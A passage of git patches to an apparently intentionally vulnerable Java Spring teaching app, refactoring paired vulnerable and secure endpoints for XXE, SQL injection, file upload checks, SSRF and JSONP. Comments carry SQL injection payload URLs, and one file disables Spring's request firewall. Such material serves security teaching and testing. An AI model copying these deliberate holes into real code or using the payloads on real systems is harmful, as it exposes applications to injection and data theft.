+            logger.info(body);
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(xml_con);
+            StringReader sr = new StringReader(body);
             InputSource is = new InputSource(sr);
             Document document = db.parse(is);  // parse xml
 
@@ -235,24 +246,24 @@ public String xxeDocumentBuilderReturn(HttpServletRequest request) {
                 }
             }
             sr.close();
-            System.out.println(buf.toString());
             return buf.toString();
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
     }
 
 
-    @RequestMapping(value = "/DocumentBuilder", method = RequestMethod.POST)
-    public String DocumentBuilder(HttpServletRequest request) {
+    // 有回显
+    @RequestMapping(value = "/DocumentBuilder/vuln02", method = RequestMethod.POST)
+    public String DocumentBuilderVuln02(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(xml_con);
+            StringReader sr = new StringReader(body);
             InputSource is = new InputSource(sr);
             Document document = db.parse(is);  // parse xml
 
@@ -266,55 +277,54 @@ public String DocumentBuilder(HttpServletRequest request) {
                     Node node = child.item(j);
                     // 正常解析XML，需要判断是否是ELEMENT_NODE类型。否则会出现多余的的节点。
                     if (child.item(j).getNodeType() == Node.ELEMENT_NODE) {
-                        result.append(node.getNodeName() + ": " + node.getFirstChild().getNodeValue() + "\n");
+                        result.append(node.getNodeName() + ": " +
+                                node.getFirstChild().getNodeValue() + "\n");
                     }
                 }
             }
             sr.close();
-            System.out.println(result.toString());
             return result.toString();
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
     }
 
 
-    @RequestMapping(value = "/DocumentBuilder_fix", method = RequestMethod.POST)
-    public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
+    @RequestMapping(value = "/DocumentBuilder/Sec", method = RequestMethod.POST)
+    public String DocumentBuilderSec(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
             dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
             DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(xml_con);
+            StringReader sr = new StringReader(body);
             InputSource is = new InputSource(sr);
-            Document document = db.parse(is);  // parse xml
+            db.parse(is);  // parse xml
             sr.close();
-
-            return "test";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+        return "DocumentBuilder xxe security code";
     }
 
 
-    @RequestMapping(value = "/DocumentBuilder_xinclude", method = RequestMethod.POST)
-    public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
+    @RequestMapping(value = "/DocumentBuilder/xinclude/vuln", method = RequestMethod.POST)
+    public String DocumentBuilderXincludeVuln(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             dbf.setXIncludeAware(true);   // 支持XInclude
             dbf.setNamespaceAware(true);  // 支持XInclude
             DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(xml_con);
+            StringReader sr = new StringReader(body);
             InputSource is = new InputSource(sr);
             Document document = db.parse(is);  // parse xml
 
@@ -326,25 +336,25 @@ public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
                 for (int j = 0; j < xxe.getLength(); j++) {
                     Node xxeNode = xxe.item(j);
                     // 测试不能blind xxe，所以强行加了一个回显
-                    System.out.println("xxeNode: " + xxeNode.getNodeValue());
+                    logger.info("xxeNode: " + xxeNode.getNodeValue());
                 }
 
             }
 
             sr.close();
-            return "test";
+            return "DocumentBuilder xinclude xxe vuln code";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
     }
 
 
-    @RequestMapping(value = "/DocumentBuilder_xinclude_fix", method = RequestMethod.POST)
-    public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
+    @RequestMapping(value = "/DocumentBuilder/xinclude/sec", method = RequestMethod.POST)
+    public String DocumentBuilderXincludeSec(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 
             dbf.setXIncludeAware(true);   // 支持XInclude
@@ -353,7 +363,7 @@ public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
             dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
             dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
             DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(xml_con);
+            StringReader sr = new StringReader(body);
             InputSource is = new InputSource(sr);
             Document document = db.parse(is);  // parse xml
 
@@ -365,59 +375,80 @@ public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
                 for (int j = 0; j < xxe.getLength(); j++) {
                     Node xxeNode = xxe.item(j);
                     // 测试不能blind xxe，所以强行加了一个回显
-                    System.out.println("xxeNode: " + xxeNode.getNodeValue());
+                    logger.info("xxeNode: " + xxeNode.getNodeValue());
                 }
 
             }
 
             sr.close();
-            return "test";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+        return "DocumentBuilder xinclude xxe vuln code";
     }
 
 
-    @PostMapping("/XMLReader/vul")
-    public String XMLReaderVul(HttpServletRequest request) {
+    @PostMapping("/XMLReader/vuln")
+    public String XMLReaderVuln(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
+
             SAXParserFactory spf = SAXParserFactory.newInstance();
             SAXParser saxParser = spf.newSAXParser();
             XMLReader xmlReader = saxParser.getXMLReader();
-            xmlReader.parse(new InputSource(new StringReader(xml_con)));
-            return "test";
+            xmlReader.parse(new InputSource(new StringReader(body)));
+
         } catch (Exception e) {
-            System.out.println(e.toString());
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+
+        return "XMLReader xxe vuln code";
     }
 
 
-    @PostMapping("/XMLReader/fixed")
+    @PostMapping("/XMLReader/sec")
     public String XMLReaderSec(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
+
             SAXParserFactory spf = SAXParserFactory.newInstance();
             SAXParser saxParser = spf.newSAXParser();
             XMLReader xmlReader = saxParser.getXMLReader();
             xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             xmlReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
             xmlReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
-            xmlReader.parse(new InputSource(new StringReader(xml_con)));
-            return "test";
+            xmlReader.parse(new InputSource(new StringReader(body)));
+
         } catch (Exception e) {
-            System.out.println(e.toString());
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+        return "XMLReader xxe security code";
     }
 
 
-    public static void main(String[] args) throws Exception {
+    /**
+     * 修复该漏洞只需升级dom4j到2.1.1及以上，该版本及以上禁用了ENTITY；
+     * 不带ENTITY的PoC不能利用，所以禁用ENTITY即可完成修复。
+     */
+    @PostMapping("/DocumentHelper/vuln")
+    public String DocumentHelper(HttpServletRequest req) {
+        try{
+            String body = WebUtils.getRequestBody(req);
+            DocumentHelper.parseText(body); // parse xml
+        } catch (Exception e) {
+            logger.error(e.toString());
+            return EXCEPT;
+        }
 
+        return "DocumentHelper xxe vuln code";
+    }
+
+    public static void main(String[] args) throws Exception {
     }
 
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/filter/JsonpFilter.java b/src/main/java/org/joychou/filter/JsonpFilter.java
index 25a72898..5027caac 100644
--- a/src/main/java/org/joychou/filter/JsonpFilter.java
+++ b/src/main/java/org/joychou/filter/JsonpFilter.java
@@ -49,9 +49,9 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
             return ;
         }
 
-        // 校验jsonp逻辑，如果不安全，返回403页面
-        if (SecurityUtil.checkURLbyEndsWith(refer, jsonpReferWhitelist) == null ){
-            logger.info("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
+        // 校验jsonp逻辑，如果不安全，返回forbidden
+        if (SecurityUtil.checkUrlByGuava(refer, jsonpReferWhitelist) == null ){
+            logger.error("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
             response.setStatus(HttpServletResponse.SC_FORBIDDEN);
             response.getWriter().write("forbidden");
             response.flushBuffer();
diff --git a/src/main/java/org/joychou/security/LoginSuccessHandler.java b/src/main/java/org/joychou/security/LoginSuccessHandler.java
index 75765b02..d588818b 100644
--- a/src/main/java/org/joychou/security/LoginSuccessHandler.java
+++ b/src/main/java/org/joychou/security/LoginSuccessHandler.java
@@ -6,7 +6,6 @@
 import org.springframework.http.MediaType;
 import org.springframework.security.core.Authentication;
 import org.springframework.security.web.authentication.AuthenticationSuccessHandler;
-import org.springframework.security.web.savedrequest.DefaultSavedRequest;
 import org.springframework.security.web.savedrequest.HttpSessionRequestCache;
 import org.springframework.security.web.savedrequest.SavedRequest;
 
@@ -14,7 +13,6 @@
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
-import java.net.URI;
 import java.util.HashMap;
 import java.util.Map;
 
@@ -31,15 +29,22 @@ public void onAuthenticationSuccess(HttpServletRequest request,
         logger.info("USER " + authentication.getName()+ " LOGIN SUCCESS.");
 
         SavedRequest savedRequest = new HttpSessionRequestCache().getRequest(request, response);
+        String originUrl = "";
+        try {
+            originUrl = savedRequest.getRedirectUrl();
+        } catch (Exception e) {
+            logger.debug(e.toString());
+        }
+
         if (savedRequest != null) {
-            logger.info("Original url is: " + savedRequest.getRedirectUrl());
+            logger.info("Original url is: " + originUrl);
         }
 
         Map<String, String> content = new HashMap<>();
         content.put("code", "0");
         content.put("message", "Login success");
-
-        // google ajax and sendRedirect
+        content.put("redirectUrl", originUrl);
+        // 直接进行sendRedirect到登录前的url，会重定向失败。具体原因可google ajax and sendRedirect
         response.setContentType(MediaType.APPLICATION_JSON_VALUE);
         response.getWriter().write(JSON.toJSONString(content));
     }
diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/SSRFChecker.java
index 6ecba2f2..08d9053a 100644
--- a/src/main/java/org/joychou/security/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/SSRFChecker.java
@@ -5,11 +5,13 @@
 import java.net.URI;
 import java.net.URL;
 import org.apache.commons.net.util.SubnetUtils;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 
 public class SSRFChecker {
 
     private static int connectTime = 5*1000;  // 设置连接超时时间5s
-
+    private static Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
     /**
      * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
      * url只允许https或者http，并且设置默认连接超时时间。
@@ -27,6 +29,7 @@ public static Boolean checkSSRF(String url) {
                 // 判断当前请求的URL是否是内网ip
                 Boolean bRet = isInnerIPByUrl(finalUrl);
                 if (bRet) {
+                    logger.error("[-] SSRF check failed. Dangerous url: " + finalUrl);
                     return false;  // 内网ip直接return，非内网ip继续判断是否有重定向
                 }
 
@@ -87,6 +90,7 @@ private static boolean isInnerIp(String strIP){
         for (String subnet: blackSubnetlist) {
             SubnetUtils utils = new SubnetUtils(subnet);
             if (utils.getInfo().isInRange(strIP)) {
+                logger.error("[-] SSRF check failed. Inner Ip: " + strIP);
                 return true;
             }
         }
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 48573454..809ac544 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -1,5 +1,6 @@
 package org.joychou.security;
 
+import com.google.common.net.InternetDomainName;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -11,8 +12,9 @@
 public class SecurityUtil {
 
     private static final Pattern FILTER_PATTERN = Pattern.compile("^[a-zA-Z0-9_/\\.-]+$") ;
+    private static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
+
 
-    protected static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
     /**
      * 通过endsWith判断URL是否合法
      *
@@ -40,6 +42,44 @@ public static String checkURLbyEndsWith(String url, String[] urlwhitelist) {
 
             return null;
         } catch (Exception e) {
+            logger.error(e.toString());
+            return null;
+        }
+    }
+
+    /**
+     * 通过google guava判断URL是否合法。默认认为localhost合法
+     *
+     * @param url 需要check的url
+     * @param urlwhitelist 根域名白名单
+     * @return 安全url返回url，危险url返回null
+     */
+    public static String checkUrlByGuava(String url, String[] urlwhitelist){
+        final String localhost = "localhost";
+
+        if (null == url) {
+            return null;
+        }
+
+        try {
+            URI u = new URI(url);
+            if (!url.startsWith("http://") && !url.startsWith("https://")) {
+                return null;
+            }
+            String host = u.getHost().toLowerCase();
+            if (localhost.equals(host)) {
+                return url;
+            }
+            String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
+
+            for (String whiteurl: urlwhitelist){
+                if (rootDomain.equals(whiteurl)) {
+                    return url;
+                }
+            }
+            return null;
+        } catch (Exception e) {
+            logger.error(e.toString());
             return null;
         }
     }
@@ -118,4 +158,5 @@ public static String cmdFilter(String input) {
 
         return input;
     }
+
 }
\ No newline at end of file
diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index 1b069872..dc6ee40f 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -53,7 +53,11 @@
             success: function (r) {
                 if (r.code == "0") {
                     // alert(r.message);
-                    location.href = ctx + "index";
+                    if (r.redirectUrl == '') {
+                        location.href = ctx + "index";
+                    } else {
+                        location.href = r.redirectUrl;
+                    }
                 } else {
                     alert(r.message);
                 }

From 0d9938584adbf0efd49273b1afc773f66cf73747 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 25 Mar 2020 11:43:53 +0800
Subject: [PATCH 071/108] update mybatis sql injection

---
 pom.xml                                       |  2 +-
 .../org/joychou/controller/FileUpload.java    | 71 +++++++-------
 .../java/org/joychou/controller/SQLI.java     | 92 +++++++++----------
 .../java/org/joychou/controller/SSRF.java     |  5 +-
 .../org/joychou/controller/URLWhiteList.java  |  1 +
 src/main/java/org/joychou/dao/User.java       |  2 -
 .../java/org/joychou/mapper/UserMapper.java   |  5 +-
 .../DisableSpringSecurityFirewall.java        | 27 ++++++
 .../org/joychou/security/SecurityUtil.java    | 46 ++++++++++
 src/main/resources/application.properties     |  2 +
 src/main/resources/mapper/UserMapper.xml      |  9 +-
 src/main/resources/templates/index.html       |  2 +-
 .../resources/templates/uploadStatus.html     | 10 --
 13 files changed, 173 insertions(+), 101 deletions(-)
 create mode 100644 src/main/java/org/joychou/security/DisableSpringSecurityFirewall.java
 delete mode 100755 src/main/resources/templates/uploadStatus.html

diff --git a/pom.xml b/pom.xml
index 14dc18dc..11de6121 100644
--- a/pom.xml
+++ b/pom.xml
@@ -7,7 +7,7 @@
     <groupId>sec</groupId>
     <artifactId>java-sec-code</artifactId>
     <version>1.0.0</version>
-    <packaging>jar</packaging>
+    <packaging>war</packaging>
 
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index 77388816..d7297539 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -4,10 +4,7 @@
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.GetMapping;
-import org.springframework.web.bind.annotation.PostMapping;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.*;
 import org.springframework.web.multipart.MultipartFile;
 import org.springframework.web.servlet.mvc.support.RedirectAttributes;
 
@@ -21,6 +18,8 @@
 import java.nio.file.Paths;
 import java.util.UUID;
 
+import org.joychou.security.SecurityUtil;
+
 
 /**
  * @author  JoyChou (joychou@joychou.org)
@@ -35,6 +34,7 @@ public class FileUpload {
     // Save the uploaded file to this folder
     private static String UPLOADED_FOLDER = "/tmp/";
     private final Logger logger= LoggerFactory.getLogger(this.getClass());
+    private final String mimeChars = "/abcdefghijklmnopqrstuvwxyz-.0123456789";
 
     @GetMapping("/")
     public String index() {
@@ -73,14 +73,13 @@ public String singleFileUpload(@RequestParam("file") MultipartFile file,
         return "redirect:/file/status";
     }
 
+
     // only upload picture
     @PostMapping("/upload/picture")
-    public String uploadPicture(@RequestParam("file") MultipartFile multifile,
-                                   RedirectAttributes redirectAttributes) throws Exception{
+    @ResponseBody
+    public String uploadPicture(@RequestParam("file") MultipartFile multifile) throws Exception{
         if (multifile.isEmpty()) {
-            // 赋值给uploadStatus.html里的动态参数message
-            redirectAttributes.addFlashAttribute("message", "Please select a file to upload");
-            return "redirect:/file/status";
+            return "Please select a file to upload";
         }
 
         String fileName = multifile.getOriginalFilename();
@@ -88,40 +87,48 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile,
         String mimeType = multifile.getContentType(); // 获取MIME类型
         File excelFile = convert(multifile);
 
-        // 判断文件后缀名是否在白名单内
-        String picSuffixList[] = {".jpg", ".png", ".jpeg", ".gif", ".bmp"};  // 后缀名白名单
-        Boolean suffixFlag = false;
+
+        // 判断文件后缀名是否在白名单内  校验1
+        String picSuffixList[] = {".jpg", ".png", ".jpeg", ".gif", ".bmp", ".ico"};
+        boolean suffixFlag = false;
         for (String white_suffix : picSuffixList) {
             if (Suffix.toLowerCase().equals(white_suffix)) {
                 suffixFlag = true;
                 break;
             }
         }
-
         if (!suffixFlag) {
             logger.error("[-] Suffix error: " + Suffix);
+            deleteFile(excelFile);
+            return "Upload failed. Illeagl picture.";
         }
 
-        String mimeTypeBlackList[] = {"text/html"}; // 不允许传html
 
-        Boolean mimeBlackFlag = false;
+        // 判断MIME类型是否在黑名单内 校验2
+        String mimeTypeBlackList[] = {
+                "text/html",
+                "text/javascript",
+                "application/javascript",
+                "application/ecmascript",
+                "text/xml",
+                "application/xml"
+        };
         for (String blackMimeType : mimeTypeBlackList) {
-            if (mimeType.equalsIgnoreCase(blackMimeType) ) {
-                mimeBlackFlag = true;
+            // 用contains是为了防止text/html;charset=UTF-8绕过
+            if (SecurityUtil.replaceSpecialStr(mimeType).toLowerCase().contains(blackMimeType) ) {
                 logger.error("[-] Mime type error: " + mimeType);
-                break;
+                deleteFile(excelFile);
+                return "Upload failed. Illeagl picture.";
             }
         }
 
+        // 判断文件内容是否是图片 校验3
         boolean isImageFlag = isImage(excelFile);
 
-        if( !isImageFlag ){
+        if( !isImage(excelFile) ){
             logger.error("[-] File is not Image");
-        }
-        if ( !suffixFlag || mimeBlackFlag || !isImageFlag ) {
-            redirectAttributes.addFlashAttribute("message", "illeagl picture");
             deleteFile(excelFile);
-            return "redirect:/file/status";
+            return "Upload failed. Illeagl picture.";
         }
 
 
@@ -130,24 +137,16 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile,
             byte[] bytes = multifile.getBytes();
             Path path = Paths.get(UPLOADED_FOLDER + multifile.getOriginalFilename());
             Files.write(path, bytes);
-
-            redirectAttributes.addFlashAttribute("message",
-                    "You successfully uploaded '" + UPLOADED_FOLDER + multifile.getOriginalFilename() + "'");
-
         } catch (IOException e) {
-            redirectAttributes.addFlashAttribute("message", "upload failed");
-            e.printStackTrace();
+            logger.error(e.toString());
             deleteFile(excelFile);
-            return "redirect:/file/status";
+            return "Upload failed";
         }
 
         deleteFile(excelFile);
-        return "redirect:/file/status";
-    }
-
-    @GetMapping("/status")
-    public String uploadStatus() {
-        return "uploadStatus";
+        logger.info("[+] Safe file. Suffix: {}, MIME: {}", Suffix, mimeType);
+        logger.info("[+] Successfully uploaded {}{}", UPLOADED_FOLDER, multifile.getOriginalFilename());
+        return "Upload success";
     }
 
     private void deleteFile(File... files) {
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index 9275593c..cf49a335 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -3,6 +3,9 @@
 
 import org.joychou.mapper.UserMapper;
 import org.joychou.dao.User;
+import org.joychou.security.SecurityUtil;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.web.bind.annotation.*;
@@ -12,9 +15,8 @@
 
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018.08.22
- * @desc    SQL Injection
+ * SQL Injection
+ * @author  JoyChou @2018.08.22
  */
 
 @SuppressWarnings("Duplicates")
@@ -22,11 +24,15 @@
 @RequestMapping("/sqli")
 public class SQLI {
 
+    private static Logger logger = LoggerFactory.getLogger(SQLI.class);
     private static String driver = "com.mysql.jdbc.Driver";
+
     @Value("${spring.datasource.url}")
     private String url;
+
     @Value("${spring.datasource.username}")
     private String user;
+
     @Value("${spring.datasource.password}")
     private String password;
 
@@ -35,12 +41,12 @@ public class SQLI {
 
 
     /**
-     * Vul Code.
+     * Vuln Code.
      * http://localhost:8080/sqli/jdbc/vul?username=joychou
      *
      * @param username username
      */
-    @RequestMapping("/jdbc/vul")
+    @RequestMapping("/jdbc/vuln")
     public String jdbc_sqli_vul(@RequestParam("username") String username){
         String result = "";
         try {
@@ -50,37 +56,28 @@ public String jdbc_sqli_vul(@RequestParam("username") String username){
             if(!con.isClosed())
                 System.out.println("Connecting to Database successfully.");
 
-            // sqli vuln code 漏洞代码
+            // sqli vuln code
              Statement statement = con.createStatement();
              String sql = "select * from users where username = '" + username + "'";
-             System.out.println(sql);
+             logger.info(sql);
              ResultSet rs = statement.executeQuery(sql);
 
-
-            System.out.println("-----------------");
-
             while(rs.next()){
                 String res_name = rs.getString("username");
                 String res_pwd = rs.getString("password");
                 result +=  res_name + ": " + res_pwd + "\n";
-                System.out.println(res_name + ": " + res_pwd);
-
+                logger.info(res_name + ": " + res_pwd);
             }
             rs.close();
             con.close();
 
 
         }catch (ClassNotFoundException e) {
-            System.out.println("Sorry,can`t find the Driver!");
-            e.printStackTrace();
+            logger.error("Sorry,can`t find the Driver!");
         }catch (SQLException e) {
-            e.printStackTrace();
+            logger.error(e.toString());
         }catch (Exception e) {
-            e.printStackTrace();
-
-        }finally{
-            System.out.println("-----------------");
-            System.out.println("Connect database done.");
+            logger.error(e.toString());
         }
         return result;
     }
@@ -103,62 +100,60 @@ public String jdbc_sqli_sec(@RequestParam("username") String username){
             if(!con.isClosed())
                 System.out.println("Connecting to Database successfully.");
 
-
             // fix code
             String sql = "select * from users where username = ?";
             PreparedStatement st = con.prepareStatement(sql);
             st.setString(1, username);
-            System.out.println(st.toString());  // sql after prepare statement
+            logger.info(st.toString());  // sql after prepare statement
             ResultSet rs = st.executeQuery();
 
-            System.out.println("-----------------");
-
             while(rs.next()){
                 String res_name = rs.getString("username");
                 String res_pwd = rs.getString("password");
                 result +=  res_name + ": " + res_pwd + "\n";
-                System.out.println(res_name + ": " + res_pwd);
-
+                logger.info(res_name + ": " + res_pwd);
             }
+
             rs.close();
             con.close();
 
-
         }catch (ClassNotFoundException e) {
-            System.out.println("Sorry,can`t find the Driver!");
+            logger.error("Sorry,can`t find the Driver!");
             e.printStackTrace();
         }catch (SQLException e) {
-            e.printStackTrace();
+            logger.error(e.toString());
         }catch (Exception e) {
-            e.printStackTrace();
-
-        }finally{
-            System.out.println("-----------------");
-            System.out.println("Connect database done.");
+            logger.error(e.toString());
         }
         return result;
     }
 
     /**
-     * vul code
-     * http://localhost:8080/sqli/mybatis/vul01?username=joychou' or '1'='1
+     * vuln code
+     * http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1
      *
      * @param username username
      */
-    @GetMapping("/mybatis/vul01")
-    public List<User> mybatis_vul1(@RequestParam("username") String username) {
-        return userMapper.findByUserNameVul(username);
+    @GetMapping("/mybatis/vuln01")
+    public List<User> mybatisVuln01(@RequestParam("username") String username) {
+        return userMapper.findByUserNameVuln01(username);
     }
 
     /**
      * vul code
-     * http://localhost:8080/sqli/mybatis/vul02?username=joychou' or '1'='1' %23
+     * http://localhost:8080/sqli/mybatis/vuln02?username=joychou' or '1'='1' %23
      *
      * @param username username
      */
-    @GetMapping("/mybatis/vul02")
-    public List<User> mybatis_vul2(@RequestParam("username") String username) {
-        return userMapper.findByUserNameVul2(username);
+    @GetMapping("/mybatis/vuln02")
+    public List<User> mybatisVuln02(@RequestParam("username") String username) {
+        return userMapper.findByUserNameVuln02(username);
+    }
+
+    // http://localhost:8080/sqli/mybatis/orderby/vuln03?sort=1 desc%23
+    @GetMapping("/mybatis/orderby/vuln03")
+    public List<User> mybatisVuln03(@RequestParam("sort") String sort) {
+        return userMapper.findByUserNameVuln03(sort);
     }
 
 
@@ -169,7 +164,7 @@ public List<User> mybatis_vul2(@RequestParam("username") String username) {
      * @param username username
      */
     @GetMapping("/mybatis/sec01")
-    public User mybatis_sec1(@RequestParam("username") String username) {
+    public User mybatisSec01(@RequestParam("username") String username) {
         return userMapper.findByUserName(username);
     }
 
@@ -180,7 +175,7 @@ public User mybatis_sec1(@RequestParam("username") String username) {
      * @param id id
      */
     @GetMapping("/mybatis/sec02")
-    public User mybatis_sec2(@RequestParam("id") Integer id) {
+    public User mybatisSec02(@RequestParam("id") Integer id) {
         return userMapper.findById(id);
     }
 
@@ -190,9 +185,14 @@ public User mybatis_sec2(@RequestParam("id") Integer id) {
      * http://localhost:8080/sqli/mybatis/sec03
      **/
     @GetMapping("/mybatis/sec03")
-    public User mybatis_sec3() {
+    public User mybatisSec03() {
         return userMapper.OrderByUsername();
     }
 
 
+    @GetMapping("/mybatis/orderby/sec04")
+    public List<User> mybatisOrderBySec04(@RequestParam("sort") String sort) {
+        return userMapper.findByUserNameVuln03(SecurityUtil.sqlFilter(sort));
+    }
+
 }
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 657f25cf..901f8b70 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -195,9 +195,10 @@ public static String ssrf_HttpClient(@RequestParam String url) {
 
 
     /**
-     * Safe code.
-     * http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com
+     * https://mvnrepository.com/artifact/commons-httpclient/commons-httpclient
+     * UserAgent: Jakarta Commons-HttpClient/3.1 (2007.08 publish)
      *
+     * http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com
      */
     @RequestMapping("/commonsHttpClient/sec")
     @ResponseBody
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index 159351cb..f4638524 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -212,4 +212,5 @@ public String sec_array_indexOf(@RequestParam("url") String url) throws Exceptio
         }
         return "Bad url.";
     }
+
 }
diff --git a/src/main/java/org/joychou/dao/User.java b/src/main/java/org/joychou/dao/User.java
index b9bc8341..1336f571 100644
--- a/src/main/java/org/joychou/dao/User.java
+++ b/src/main/java/org/joychou/dao/User.java
@@ -15,7 +15,6 @@ public void setId(Integer id) {
         this.id = id;
     }
 
-
     public String getUsername() {
         return username;
     }
@@ -23,7 +22,6 @@ public void setUsername(String username) {
         this.username = username;
     }
 
-
     public String getPassword() {
         return password;
     }
diff --git a/src/main/java/org/joychou/mapper/UserMapper.java b/src/main/java/org/joychou/mapper/UserMapper.java
index 962f465d..b88fb561 100644
--- a/src/main/java/org/joychou/mapper/UserMapper.java
+++ b/src/main/java/org/joychou/mapper/UserMapper.java
@@ -18,9 +18,10 @@ public interface UserMapper {
     User findByUserName(@Param("username") String username);
 
     @Select("select * from users where username = '${username}'")
-    List<User> findByUserNameVul(@Param("username") String username);
+    List<User> findByUserNameVuln01(@Param("username") String username);
 
-    List<User> findByUserNameVul2(String username);
+    List<User> findByUserNameVuln02(String username);
+    List<User> findByUserNameVuln03(@Param("order") String order);
 
     User findById(Integer id);
 
diff --git a/src/main/java/org/joychou/security/DisableSpringSecurityFirewall.java b/src/main/java/org/joychou/security/DisableSpringSecurityFirewall.java
new file mode 100644
index 00000000..d7f12627
--- /dev/null
+++ b/src/main/java/org/joychou/security/DisableSpringSecurityFirewall.java
@@ -0,0 +1,27 @@
+package org.joychou.security;
+
+import org.springframework.security.web.firewall.FirewalledRequest;
+import org.springframework.security.web.firewall.HttpFirewall;
+import org.springframework.security.web.firewall.RequestRejectedException;
+import org.springframework.stereotype.Component;
+
